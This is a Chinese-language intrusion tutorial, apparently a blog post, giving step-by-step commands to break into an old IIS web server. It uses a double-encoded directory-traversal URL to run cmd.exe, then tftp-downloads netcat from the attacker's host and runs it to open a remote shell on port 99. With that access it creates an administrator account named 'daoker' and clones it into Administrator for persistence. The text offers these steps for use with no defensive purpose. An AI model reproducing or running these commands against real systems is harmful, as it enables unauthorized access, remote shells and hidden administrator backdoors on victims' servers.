入侵其实和炒菜一样.都得先备好料..反正我是这么理解的.(我可不是厨师哦)以下是我备的料.
GetAccount.exe (榕哥的东西)
CA.exe (也是榕哥的东西
X-way2.5.zip (一个扫描软件)
tftpd32.exe (一个小巧的ftp服务器软件)
nc.exe (一个可以telnet到99端口的东西)
好了.下面开始吧..
第一步.
用X-way2.5扫描***.***.***.***发现***.***.***.***/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
哈哈.找到了..就这个吧.
第二步
运行tftpd32.运行之后你的机器就是一个ftp服务器了.回到你的浏览器,在地址栏里填入http://***.***.***.***/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+tftp -i ***.***.***.*** GET nc.exe c:\\inetpub\\scripts\\nc.exe然后等那么一小会就会传到主机c:\inetpub\scripts\目录了,这时我们要让主机运行nc.exe, ***.***.***.***/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+c:\inetpub\scripts\nc.exe
第三步
然后telnet ***.***.***.*** 99 呵呵...进来了吧.
下面我们建一个用户名为daoker口令为daoker的用户.
net user daoker daoker /add
将daoker这个用户加入administrators组
网管bitscn_com
net localgroup administrators daoker /add
第四步
下面利用CA.exe 将daoker克隆为Administrator
ca \\***.***.***.*** test test daoker password
这时,daoker就成为了超级用户,并有具有和Administrator同样的设置,桌面、菜单等等。
是不是很爽啊.发果要是再开个3389什么的.是不是很爽啊...
评论加载中…
